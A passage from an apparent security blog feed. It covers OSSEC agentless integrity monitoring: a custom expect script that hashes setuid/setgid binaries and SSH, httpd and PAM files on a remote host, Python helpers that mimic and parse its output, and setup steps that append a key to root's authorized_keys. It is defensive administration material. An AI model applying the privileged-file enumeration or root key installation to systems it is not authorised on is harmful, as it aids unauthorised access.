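    """Equivalent of: find / -type f \\( -perm -4000 -o -perm -2000 \\)"""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def walk(root: str) -> Iterator[str]:
    """Every directory and file below root, like a bare 'find root' minus root itself."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            yield os.path.join(dirpath, name)


def select_paths(root: str) -> List[str]:
    """Union of the two finds, filtered through EXCLUDE and deduplicated."""
    chosen = set()
    for path in walk(root):
        if is_setid_file(path):
            chosen.add(path)
        if os.path.basename(path) in NAME_PATTERNS:
            # find ... -exec find {} \; lists the match itself and everything under it
            chosen.add(path)
            if os.path.isdir(path) and not os.path.islink(path):
                chosen.update(walk(path))
    return sorted(p for p in chosen if not EXCLUDE.search(p))


def fwd_line(path: str) -> str:
    """'FWD: size:mode:uid:gid:md5:sha1 path', as stat %s:%a:%u:%g plus both digests."""
    st = os.stat(path)
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    mode = oct(st.st_mode & 0o7777)[2:]  # "644", "4755", ... exactly as %a prints it
    return (f"FWD: {st.st_size}:{mode}:{st.st_uid}:{st.st_gid}:"
            f"{md5.hexdigest()}:{sha1.hexdigest()} {path}")


def report(root: str) -> List[str]:
    """FWD: lines for the selected regular files. Directories and symlinks are
    skipped, which is what the 'tail $i >/dev/null && ...' guard does in the script."""
    return [fwd_line(p) for p in select_paths(root)
            if os.path.isfile(p) and not os.path.islink(p)]


def build_sample_tree() -> str:
    """Constructed tree with one example per rule; returns its (absolute) root."""
    root = tempfile.mkdtemp(prefix="ossec-demo-")
    spec = {  # relative path -> (content, mode)
        "bin/su": (b"#!/bin/sh\n", 0o4755),                  # setuid: selected
        "bin/cat": (b"#!/bin/sh\n", 0o755),                  # ordinary: not selected
        "etc/motd": (b"welcome\n", 0o644),                   # not selected
        "etc/ssh/sshd_config": (b"PermitRootLogin no\n", 0o600),  # under 'ssh': selected
        "etc/ssh/moduli": (b"# moduli\n", 0o644),            # selected, then excluded
        "root/.ssh/authorized_keys": (b"", 0o600),           # under '.ssh': selected (empty)
        "root/.ssh/known_hosts": (b"host key\n", 0o644),     # selected, then excluded
        "var/www/.htaccess": (b"Deny from all\n", 0o644),    # name match: selected
    }
    for rel, (content, mode) in spec.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
        os.chmod(full, mode)
    return root


if __name__ == "__main__":
    for line in report(build_sample_tree()):
        print(line)
```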

<h2 id="creating_ssh_dmz_linux">Creating ssh_dmz_linux</h2>

<p>We don&#8217;t want to make changes to <code>ssh_integrity_check_linux</code> directly so we will need to make a copy.</p>

<pre><code>obsd46# (cd /var/ossec/agentless &amp;&amp; cp ssh_integrity_check_linux ssh_dmz_linux)
</code></pre>

<p>When integrating our new command line into the script we must pay close attention to the special characters that <code>expect</code> will process.  Because of this we need to escape every <code>\</code> and <code>"</code> by preceding it with <code>\</code>.   Once we are done escaping, we just insert our new line in place of <code>find $args 2&gt;/dev/null</code> in our new file.</p>

<p>Here is what the completed script will look like.</p>

<pre><code>obsd56# cat /var/ossec/agentless/ssh_dmz_linux
#!/usr/bin/env expect

# @(#) $Id: ssh_integrity_check_linux,v 1.11 2009/06/24 17:06:21 dcid Exp $
# Agentless monitoring
#
# Copyright (C) 2009 Trend Micro Inc.
# All rights reserved.
#
# This program is a free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License (version 3) as published by the FSF - Free Software
# Foundation.


# Main script.
source "agentless/main.exp"


# SSHing to the box and passing the directories to check.
if [catch {
    spawn ssh $hostname
} loc_error] {
    send_user "ERROR: Opening connection: $loc_error.\n"
    exit 1;
}


source $sshsrc
source $susrc

set timeout 600
send "echo \"INFO: Starting.\"; for i in `(find / \\( -name \".ssh\" -o -name \"ssh\" -o -name \"sshd\" -o -name \"httpd\" -o -name \".htaccess\" -o -name \"pam.d\" \\) -exec find {} \\; &amp;&amp; find / -type f \\( -perm -4000 -o -perm -2000 \\); ) 2&gt;/dev/null | egrep -v \"known_hosts|moduli|var\\/log|var\\/lock\" | sort -u`; do tail \$i &gt;/dev/null 2&gt;&amp;1 &amp;&amp; md5=`md5sum \$i | cut -d \" \" -f 1` &amp;&amp; sha1=`sha1sum \$i | cut -d \" \" -f 1` &amp;&amp; echo FWD: `stat --printf \"%s:%a:%u:%g\" \$i`:\$md5:\$sha1 \$i; done; exit\r"
send "exit\r"

expect {
    timeout {
        send_user "ERROR: Timeout while running commands on host: $hostname .\n"
        exit 1;
    }
    eof {
        send_user "\nINFO: Finished.\n"
        exit 0;
    }
}

exit 0;
</code></pre>

<h4 id="testing_ssh_dmz_linux">Testing</h4>

<p>Before we add this new script to the OSSEC configuration we need to test it.</p>

<pre><code>obsd46# (cd /var/ossec &amp;&amp; sudo -u ossec ./agentless/ssh_dmz_linux root@172.17.20.20 )

ERROR: ssh_integrity_check &lt;hostname&gt; &lt;arguments&gt;
</code></pre>

<p>The error above is caused by our not using the <code>$args</code> variable in the way <code>ssh_integrity_check_linux</code> expects us to.  Solving this properly would require making changes to files that also affect the other built-in scripts, so a quick solution is to pass any placeholder as the argument.  This has no effect on our script, as we never use <code>$args</code>.</p>

<pre><code>obsd46# (cd /var/ossec &amp;&amp; sudo -u ossec ./agentless/ssh_dmz_linux root@172.17.20.20 NOTUSED)
spawn ssh root@172.17.20.20
Last login: Wed Nov  4 13:46:32 2009 from 172.17.20.131^M
[linux26 ~]#  
INFO: Started.
echo "INFO: Starting."; for i in `(find / \( -name ".ssh" -o -name "ssh" -o -name "sshd" -o -name "httpd" 
-o -name ".htaccess" -o -name "pam.d" \)  -exec find {} \; &amp;&amp; find / -type f \( -perm -4000 -o -perm -2000 
\); ) 2&gt;/dev/null | egrep -v "known_hosts|moduli|var\/log|var\/lock"`;do tail $i &gt;/dev/null 2&gt;&amp;1 &amp;&amp;
 md5=`md5s ^Mum $i | cut -d " " -f 1` &amp;&amp; sha1=`sha1sum $i | cut -d " " -f 1` &amp;&amp; echo FWD: `stat --printf 
"%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
INFO: Starting.
FWD: 14:775:100:101:3bc0a3e92f8170084dd102eda9a474b1:25a1783a3c6bdd9745ec245ec1bfa0414ee05d23 /var/www/html/admin/modules/.htaccessmodules/.htaccess
FWD: 3519:644:0:0:e4ca381035a34b7a852184cc0dd89baa:6e43d0b5a46ed5ba78da5c7e9dcf319b27d769e7 /var/empty/sshd/etc/localtime
FWD: 560:644:0:0:58370830ecfa056421ad21aff9c18905:d115bb5aeefaab97c53fbbd5df84ebcb9170d796 /etc/httpd/conf.d/php.conf
[...................SNIP.............................]
FWD: 392:644:0:0:e92bea7e9d70a9ecdc61edd7c0a2f59a:d77b61dac010c60589b4d8a2039e3b8a5bed18b2 /etc/httpd/conf.d/README
FWD: 70888:4711:0:0:9046bd13339e7ef22266067b633e601a:3fc41029ddb14fe4ed613f479fa9e89c944f04dd /usr/bin/sperl5.8.8
FWD: 315416:6755:0:0:4c63a9709fb7f0f97c30aa29d204859c:c379efa658de72866b8f6de5767906ff78d127b0 /usr/bin/crontab
FWD: 88964:2755:0:99:baf3ebef6377d6ef42858776c33621b0:62394bf57d18c3fd49adeb39a1da61661cabc3c8 /usr/bin/ssh-agent
logout
Connection to 172.17.20.20 closed.

INFO: Finished.

</code></pre>

<h4 id="going_live">Going live</h4>

<p>We have created a new OSSEC agentless script, and I am going to enable it using the <a href="http://bitbucket.org/jrossi/ossec-hids-tools/">ossec-hids-tools</a> that I introduced in my last post about OSSEC (<a href="/archives/2009/11/ossec-agentless-to-save-the-day/">OSSEC: Agentless to save the day</a>).   A restart of OSSEC is also needed for the changes to take effect.</p>

<pre><code>obsd46# ossec-config --section agentless --add --host root@172.17.20.20 --type ssh_dmz_linux --state periodic --argv "NOTUSED"
obsd46# /var/ossec/bin/ossec-control restart
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
Killing ossec-remoted .. 
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
Killing ossec-maild .. 
ossec-execd not running ..
Killing ossec-agentlessd .. 
OSSEC HIDS v2.2 Stopped
Starting OSSEC HIDS v2.2 (by Trend Micro Inc.)...
Started ossec-agentlessd...
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.
</code></pre>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/11/ossec-agentless-scripts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>OSSEC: Agentless to save the day</title>
		<link>http://praetorianprefect.com/archives/2009/11/ossec-agentless-to-save-the-day/</link>
		<comments>http://praetorianprefect.com/archives/2009/11/ossec-agentless-to-save-the-day/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 23:04:21 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[agentless]]></category>
		<category><![CDATA[hids]]></category>
		<category><![CDATA[lids]]></category>
		<category><![CDATA[ossec]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1395</guid>
		<description><![CDATA[OSSEC is a Host Intrusion detection system (HIDS) in name, but in reality it is far more.  It's able to look for rootkits, monitor logs (LIDS), and even actively respond to defined events.  While all these features are great the unsung hero is agentless monitoring.]]></description>
			<content:encoded><![CDATA[<blockquote>
  <p>Lois, Clark Kent may seem like just a mild-mannered reporter, but listen, not only does he know how to treat his editor-in-chief with the proper respect, not only does he have a snappy, punchy prose style, but he is, in my forty years in this business, the fastest typist I&#8217;ve ever seen.</p>
  
  <p><code>Perry White</code></p>
</blockquote>

<p>Michael Starks from <a href="http://www.immutablesecurity.com/">Immutable Security</a> published the &#8220;Week of OSSEC&#8221; all last week (find the links at the end of the article), and it was a great set of posts.</p>

<p>With all the hard work done by Michael in his &#8220;Week of OSSEC&#8221;, I figured I should follow up with a few posts of my own about this great tool.  I am <strong>NOT</strong> going to do a week of posts, but will try to get as much information out as I can.</p>

<h3>OSSEC</h3>

<p><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Screen-shot-2009-11-02-at-8.06.14-PM.png" border="0" alt="Screen shot 2009-11-02 at 8.06.14 PM.png" width="66" height="64" /></p>

<p>OSSEC is a Host Intrusion Detection System (HIDS) in name, but in reality it is far more.  It&#8217;s able to look for rootkits, monitor logs (LIDS), and even actively respond to defined events.  While all these features are great, the unsung hero is agentless monitoring.</p>

<p>Agentless security monitoring is really a great feature that does not get explored often enough, so I am going to show how to get it up and running and then get it monitoring remote hosts.</p>

<h3 id="ossec-install">Installing OSSEC</h3>

<p>This is going to be one of the fastest OSSEC install instructions on the internet.  For full details, see the main <a href="http://www.ossec.net/main/documentation/">OSSEC website</a>, which covers this topic in more detail.  The key thing to note here is that I have installed it as a server.  I could have installed OSSEC locally and we would still have been able to do everything that follows.</p>

<p>My install log for OSSEC 2.2 is <a title="install-ossec-v2.2.txt" href="http://praetorianprefect.com/wp-content/uploads/2009/10/install-ossec-v2.2.txt">here</a>.</p>

<h3 id="agentless-enable">Enabling agentless</h3>

<p>To make use of agentless security monitoring, it first needs to be enabled.  Full details are also on the <a href="http://www.ossec.net/main/manual/manual-agentless-monitoring/">OSSEC webpage</a>.</p>

<h4>Agentless Requirements</h4>

<p>Most of the built-in agentless monitoring scripts need <code>expect</code> in order to function.  In this example on OpenBSD 4.5, adding the <code>expect</code> package is simple with <code>pkg_add</code>.</p>

<pre><code>obsd46# pkg_add http://openbsd.mirror.frontiernet.net/pub/OpenBSD/4.5/packages/i386/expect-5.43.0p0-no_tk.tgz
tcl-8.4.19: complete
expect-5.43.0p0-no_tk: complete
--- tcl-8.4.19 -------------------
You may wish to add /usr/local/lib/tcl8.4/man to /etc/man.conf
</code></pre>

<h4>Turning on Agentless</h4>

<p>Now we need to enable agentless by running the following command:</p>

<pre><code>obsd46# /var/ossec/bin/ossec-control enable agentless
</code></pre>

<h4>Adding a host.</h4>

<p>We need to add a host to agentlessly monitor. If we were to authenticate using a password for host <code>172.17.20.20</code> we would use the following:</p>

<pre><code>obsd46# /var/ossec/agentless/register_host.sh add agentless@172.17.20.20
</code></pre>

<p>While using a password does work, the preferred method is to use SSH keys to provide the access level needed.  To set up that method of access, you first need to create SSH keys for the user <code>ossec</code>, which is the account the agentless scripts run as.</p>

<pre><code>obsd46# sudo -u ossec ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/var/ossec/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /var/ossec/.ssh/id_rsa.
Your public key has been saved in /var/ossec/.ssh/id_rsa.pub.
The key fingerprint is:
b8:c3:47:9a:33:09:5c:eb:54:a0:82:39:a6:06:63:08 ossec@obsd45.ptnsecurity.com
The key's randomart image is:
+--[ RSA 2048]----+
|E     .          |
|oo   . .         |
|Bo. . . .        |
|=o o . +         |
|..  o + S        |
|.    = *         |
|      @ .        |
|       =         |
|                 |
+-----------------+
</code></pre>

<p>Now that the SSH keys are present, we can add the host without a password.  The special command line argument used with <code>register_host.sh</code> is <code>NOPASS</code>, in all capitals, which tells the OSSEC-supplied scripts to make use of SSH keys.</p>

<pre><code>obsd46# /var/ossec/agentless/register_host.sh add root@172.17.20.20 NOPASS
</code></pre>

<h4>Enabling SSH key on the host to be monitored.</h4>

<p>You will now need to securely get the contents of <code>/var/ossec/.ssh/id_rsa.pub</code> to 172.17.20.20.</p>

<p>Using SSH with the password one last time makes this simple.  The command creates <code>/root/.ssh</code> if it does not already exist, and prints an error (as it does here) if the directory is already present; that error is harmless and can be ignored.</p>

<pre><code>obsd46# cat /var/ossec/.ssh/id_rsa.pub | ssh root@172.17.20.20 "( mkdir /root/.ssh/;  cat - &gt;&gt; /root/.ssh/authorized_keys )"
root@172.17.20.20's password:
mkdir: cannot create directory `/root/.ssh/': File exists
obsd46# ssh root@172.17.20.20 "cat  /root/.ssh/authorized_keys "
root@172.17.20.20's password:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzyTBo7CqkI0TISR9S+KPS/gYY60nkD7Qe8wTTXrAEFvPNFJ
NJJpVVKsij6zw86lvTZ6hx9ib1M+MXvt+70uF/z1hYwnYrczR2TR03Z5nwOUA9OK61nBWXVwCi9GsQs6Oeo
mY9vkBDoKzB52+TKKSk9ZoC+HYPiT5SaiHZvMOV7kWuwF67lnYwlG5FdkRdOiXp7DcRjje4/Hixg7RLLl7o
dEXpIakzGfalt3yQDmwvSUZhyg3OuoKimTeNiKU/jlHlmEPuDZpiQe6QhFH38EeEIZTdHsYITodl8sY+n9I
eNMalGIHPs+bph+qcK+6cOb1RGaeGqJBFjaqPUyismz0bw== ossec@obsd45.ptnsecurity.com
</code></pre>

<p>We can also verify that it worked with the following command.</p>

<pre><code>obsd46# sudo -u ossec ssh root@172.17.20.20
The authenticity of host '172.17.20.20 (172.17.20.20)' can't be established.
RSA key fingerprint is 14:cd:f2:e9:c3:5b:07:28:68:75:a7:b5:88:c2:6b:77.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.17.20.20' (RSA) to the list of known hosts.
Last login: Tue Oct  6 12:40:05 2009 from 172.17.20.154
[linux26.ptnsecurity.com ~]# exit
</code></pre>

<h4>Add the agentless host to ossec.conf</h4>

<p>While we have set up and prepared everything to allow agentless security monitoring of <code>172.17.20.20</code>, we have not yet told OSSEC to make use of it.  To simplify adding the agentless entry to the config, we are going to use the Python library and tools I created, <a href="http://bitbucket.org/jrossi/ossec-hids-tools/">ossec-hids-tools</a>.</p>

<p>First, let&#8217;s check which agentless hosts have already been configured; like a good unix program, it outputs nothing when there is nothing to report.</p>

<pre><code>obsd46# ossec-config --section agentless --show
</code></pre>

<p>Next, add our host to the configuration.  I am using the OSSEC-supplied script <code>ssh_integrity_check_linux</code>.  This script logs in to the remote host and sends back to the OSSEC server, via stdout, an MD5 and a SHA1 hash of every file inside the paths given as arguments.  To demonstrate the output the server sees, let&#8217;s test the script and review that output.</p>

<p>All testing of agentless scripts must be run from the directory <code>/var/ossec/</code> unless you compiled a different install location.</p>

<pre><code>obsd46# cd /var/ossec
obsd46# sudo -u ossec ./agentless/ssh_integrity_check_linux root@172.17.20.20 /etc
spawn ssh root@172.17.20.20
Last login: Mon Nov  2 17:53:23 2009 from 172.17.20.131
[tss-uvc-01v.ptn.local ~]#
INFO: Started.
t -d " " -f 1` &amp;&amp; echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit md5=`md5sum $i | cut -d " " -f 1` &amp;&amp; sha1=`sha1sum $i | cu
INFO: Starting.
FWD: 14612:644:0:0:509377d820692110c7a6cc83ef2c2da8:bf610c1fa14d84d8b3b44ec80b81788457f77420 /etc/sound/events/gtk-events-2.soundlist
FWD: 22291:644:0:0:d6139aa9554d4997ea25ec2d56095f51:26b9ae7784943eecaeb2dcd4b2ae3a32371d61c8 /etc/sound/events/gnome-2.soundlist
FWD: 83:644:0:0:9f87609f65b51761657c7d67881ae582:de82c03c535e9deb16aed94153883280891da2d7 /etc/modprobe.d/blacklist-firewire
^C^C#
</code></pre>

<p>I only let the script run for a few seconds to see the output, but the key things to notice are the lines beginning with &#8220;INFO&#8221; or &#8220;FWD&#8221;.</p>

<p>Anything that starts with &#8220;<code>INFO</code>&#8221; is logged to the <code>/var/ossec/logs/ossec.log</code> file for debugging and troubleshooting; we will make use of this later on in this post.  The &#8220;<code>FWD</code>&#8221; tag at the beginning of a line tells the OSSEC server to store the hash information that follows.  This becomes useful when a file&#8217;s contents change: the hash changes in turn, and OSSEC is able to notify you when this happens.</p>
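<p>To make the &#8220;<code>FWD</code>&#8221; lines concrete, here is a small Python parser and baseline comparison, added as an example for this article; it is not part of OSSEC or of ossec-hids-tools.  It takes the <code>size:mode:uid:gid:md5:sha1 path</code> layout from the script output shown above, ignores the <code>INFO</code> lines and the wrapped echo of the remote command, and reports the same kind of change OSSEC&#8217;s rule 550 reports.  The two sample runs are constructed for the example (only the <code>/etc/shadow</code> hashes are the ones from the notification shown later in the post).</p>

```python
import re

# One line per file, as emitted by ssh_integrity_check_linux:
#   FWD: <size>:<mode>:<uid>:<gid>:<md5>:<sha1> <path>
FWD_RE = re.compile(
    r"^FWD: (?P<size>\d+):(?P<mode>[0-7]+):(?P<uid>\d+):(?P<gid>\d+):"
    r"(?P<md5>[0-9a-f]{32}):(?P<sha1>[0-9a-f]{40}) (?P<path>/\S.*)$"
)

# Constructed sample output of two runs. The /etc/shadow hashes are taken from
# the OSSEC notification in the post; every other value is made up.
BASELINE_RUN = """\
INFO: Started.
t -d " " -f 1` && echo FWD: `stat --printf "%s:%a:%u:%g" $i`:$md5:$sha1 $i; done; exit
INFO: Starting.
FWD: 83:644:0:0:9f87609f65b51761657c7d67881ae582:de82c03c535e9deb16aed94153883280891da2d7 /etc/modprobe.d/blacklist-firewire
FWD: 1104:400:0:0:0d92e12c92f3edcf9d8876ea57c5f677:2270c03a920ef8dd50e11cefdef046a8660f7a29 /etc/shadow
FWD: 17:644:0:0:d41d8cd98f00b204e9800998ecf8427e:da39a3ee5e6b4b0d3255bfef95601890afd80709 /etc/motd
INFO: Finished.
"""

CURRENT_RUN = """\
INFO: Started.
INFO: Starting.
FWD: 83:644:0:0:9f87609f65b51761657c7d67881ae582:de82c03c535e9deb16aed94153883280891da2d7 /etc/modprobe.d/blacklist-firewire
FWD: 1106:400:0:0:2bd51b61dea17c5682fb2c0cf4f92c63:d9518ea9022b10d07f81925c6d7f2abb4364b548 /etc/shadow
FWD: 158:644:0:0:5d41402abc4b2a76b9719d911017c592:aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d /etc/hosts
INFO: Finished.
"""

# Field labels in the wording OSSEC uses in its notification mail.
LABELS = {"md5": "md5sum", "sha1": "sha1sum", "size": "size", "mode": "permissions"}


def parse_run(text):
    """Map path -> attributes for every FWD: line; every other line is ignored."""
    files = {}
    for line in text.splitlines():
        m = FWD_RE.match(line)
        if m:
            attrs = m.groupdict()
            files[attrs.pop("path")] = attrs
    return files


def diff_runs(baseline, current):
    """Return (event, path, changed_fields) tuples. changed_fields maps a field
    name to (old, new) for 'changed' events and is empty for added/deleted."""
    events = []
    for path, new in current.items():
        old = baseline.get(path)
        if old is None:
            events.append(("added", path, {}))
        else:
            delta = {k: (old[k], new[k]) for k in new if old[k] != new[k]}
            if delta:
                events.append(("changed", path, delta))
    for path in baseline:
        if path not in current:
            events.append(("deleted", path, {}))
    return events


def checksum_alerts(baseline_text, current_text):
    """Render 'changed' events in the style of the rule 550 notification."""
    alerts = []
    for event, path, delta in diff_runs(parse_run(baseline_text), parse_run(current_text)):
        if event != "changed":
            continue
        lines = ["Integrity checksum changed for: '%s'" % path]
        for field in ("md5", "sha1", "size", "mode"):
            if field in delta:
                lines.append("Old %s was: '%s'" % (LABELS[field], delta[field][0]))
                lines.append("New %s is : '%s'" % (LABELS[field], delta[field][1]))
        alerts.append("\n".join(lines))
    return alerts


if __name__ == "__main__":
    for event, path, delta in diff_runs(parse_run(BASELINE_RUN), parse_run(CURRENT_RUN)):
        print(event, path, delta)
    print("\n\n".join(checksum_alerts(BASELINE_RUN, CURRENT_RUN)))
```

<p>Note that the comparison is on the stored attributes only: the script never sees file contents, so a change that keeps size, mode and both hashes identical is invisible to it, which is exactly why OSSEC records two different hashes rather than one.</p>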

<p>Now let&#8217;s complete adding our host to the OSSEC configuration.</p>

<pre><code>obsd46# ossec-config --section agentless --add --host root@172.17.20.20 --type ssh_integrity_check_linux \
--state periodic --argv "/bin /etc /sbin"
</code></pre>

<p>Let&#8217;s verify it&#8217;s what we expect.</p>

<pre><code>obsd46# ossec-config --section agentless --show
type: ssh_integrity_check_linux
frequency: 3600
host: root@172.17.20.20
state: periodic
arguments: /bin /etc /sbin
</code></pre>

<p>Time to restart the daemons for the changes to take effect.</p>

<pre><code>obsd46# /var/ossec/bin/ossec-control stop
Killing ossec-monitord ..
Killing ossec-logcollector ..
ossec-remoted not running ..
Killing ossec-syscheckd ..
Killing ossec-analysisd ..
Killing ossec-maild ..
ossec-execd not running ..
ossec-agentlessd not running ..
OSSEC HIDS v2.2 Stopped
obsd46# /var/ossec/bin/ossec-control start
Starting OSSEC HIDS v2.2 (by Trend Micro Inc.)...
Started ossec-agentlessd...
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.
</code></pre>

<h3 id="agentless-test">Testing agentless</h3>

<p>Checking the log files, we can see what the agentless security monitor has done so far.</p>

<pre><code>obsd46# grep agentless logs/ossec.log
2009/09/21 14:59:49 ossec-agentlessd: INFO: Started (pid: 15320).
2009/09/21 14:59:51 ossec-agentlessd: INFO: Test passed for 'ssh_integrity_check_linux'.
2009/09/21 15:00:53 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Started.
2009/09/21 15:00:53 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Starting.
2009/09/21 15:01:34 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Finished.
</code></pre>

<p>Now we have one last thing to do to see that it&#8217;s working as expected: make a change to the file system on <code>172.17.20.20</code> that OSSEC will notice on the next run.  I am going to change the root password for now.</p>

<pre><code>obsd46# ssh -i /var/ossec/.ssh/id_rsa root@172.17.20.20
Last login: Tue Oct  6 14:38:48 2009 from 172.17.20.154
[linux26.ptnsecurity.com ~]# passwd
Changing password for user root.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[linux26.ptnsecurity.com ~]# exit
</code></pre>

<p>Take a look at the logs for ossec-agentlessd to check the host. Again, we see that it completed another scan.</p>

<pre><code>obsd46# grep agentless logs/ossec.log
2009/09/21 15:18:27 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Started.
2009/09/21 15:18:27 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Starting.
2009/09/21 15:18:46 ossec-syscheckd: INFO: Finished creating syscheck database (pre-scan completed).
2009/09/21 15:19:06 ossec-agentlessd: INFO: ssh_integrity_check_linux: root@172.17.20.20: Finished.
</code></pre>

<p>Note that we also received the following email notifying us that <code>/etc/shadow</code> changed as a result of the password change, exactly the kind of event that is very useful to have reported.</p>

<pre><code>OSSEC HIDS Notification.
2009 Sep 21 15:19:00

Received From: (ssh_integrity_check_linux) root@172.17.20.20-&gt;syscheck
Rule: 550 fired (level 7) -&gt; "Integrity checksum changed."
Portion of the log(s):

Integrity checksum changed for: '/etc/shadow'
Old md5sum was: '0d92e12c92f3edcf9d8876ea57c5f677'
New md5sum is : '2bd51b61dea17c5682fb2c0cf4f92c63'
Old sha1sum was: '2270c03a920ef8dd50e11cefdef046a8660f7a29'
New sha1sum is : 'd9518ea9022b10d07f81925c6d7f2abb4364b548'

--END OF NOTIFICATION
</code></pre>

<hr />

<p>Week of OSSEC Links:</p>

<ul>
<li>Day 1: <a href="http://www.immutablesecurity.com/index.php/2009/10/25/week-of-ossec-day-1-detecting-world-writable-files/">Detecting World-Writable Files</a></li>
<li>Day 2: <a href="http://www.immutablesecurity.com/index.php/2009/10/26/week-of-ossec-day-2-detecting-new-files/">Detecting New Files</a></li>
<li>Day 3: <a href="http://www.immutablesecurity.com/index.php/2009/10/27/week-of-ossec-day-3-use-variables/">Using Variables</a></li>
<li>Day 4: <a href="http://www.immutablesecurity.com/index.php/2009/10/28/week-of-ossec-day-4-using-groups/">Using Groups</a></li>
<li>Day 5: <a href="http://www.immutablesecurity.com/index.php/2009/10/29/week-of-ossec-day-5-reusing-rule-ids/">Reusing Rule IDs</a></li>
<li>Day 6: <a href="http://www.immutablesecurity.com/index.php/2009/10/30/week-of-ossec-day-6-developing-a-tuning-strategy/">Developing a Tuning Strategy</a></li>
<li>Day 7: <a href="http://www.immutablesecurity.com/index.php/2009/10/31/week-of-ossec-day-7-developing-a-workflow/">Developing a Workflow</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/11/ossec-agentless-to-save-the-day/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Replace watch.swf with warp.swf on YouTube</title>
		<link>http://praetorianprefect.com/archives/2009/10/replace-watch-swf-with-warp-swf-on-youtube/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/replace-watch-swf-with-warp-swf-on-youtube/#comments</comments>
		<pubDate>Tue, 27 Oct 2009 07:13:42 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Asides]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1218</guid>
		<description><![CDATA[If you replace watch.swf with warp.swf in a url on youtube, a new application shows up that dynamically opens up new nodes of related videos. It's both interesting and bizarre, and a good way to burn five minutes: <a href="http://www.youtube.com/warp.swf?v=oHg5SJYRHA0">Youtube Warp</a>.]]></description>
			<content:encoded><![CDATA[<p>If you replace /watch with warp.swf in a url on youtube, a new application shows up that dynamically opens up new nodes of related videos. It's both interesting and bizarre, and a good way to burn five minutes: <a href="http://www.youtube.com/warp.swf?v=fVXYzcb3r-w">YouTube Warp</a>.</p>

<p>If you really like it you can install this <a href="javascript:a=location.href.replace('watch','warp.swf');location.href=a;">Warp Bookmarklet</a> to quickly jump to Warp from any YouTube video. Right click on the &#8216;Warp Bookmarklet&#8217; link in the previous sentence and select Add to Favorites or Bookmark this Link, and place the link in the browser&#8217;s toolbar.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/microsoft-ie-6-7-zero-day-aside/">Microsoft IE 6 &#038; 7 Zero-day (Aside)</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/replace-watch-swf-with-warp-swf-on-youtube/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The Barack Obama Donations Site was Hacked…err, no it wasn’t.</title>
